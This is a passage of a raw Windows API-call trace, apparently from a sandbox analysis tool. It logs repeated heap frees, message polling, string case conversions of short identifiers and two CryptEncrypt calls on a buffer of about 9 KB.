hHeap=0x25c0000) returned 1 [0207.584] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.584] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.585] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.586] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.586] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.586] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.586] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.586] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.587] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0207.587] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.588] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0207.588] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0207.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0207.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.589] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.598] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.598] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.598] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0207.599] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0207.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.602] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0207.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0207.603] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0207.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0207.604] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0207.604] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x2427, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x2428) returned 1 [0207.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.604] CharLowerBuffW (in: lpsz="byte[9256]", cchLength=0xa | out: lpsz="byte[9256]") returned 0xa [0207.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.605] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.605] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.605] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.605] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.605] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.605] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0207.605] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.605] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24d7a58*, pdwDataLen=0x8bef68*=0x2427, dwBufLen=0x2428 | out: pbData=0x24d7a58*, pdwDataLen=0x8bef68*=0x2428) returned 1 [0207.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.606] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.606] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.606] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.606] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.607] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.607] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.607] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0207.607] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.607] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.607] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.607] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.608] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.608] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0207.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.608] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0207.608] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0207.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.608] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 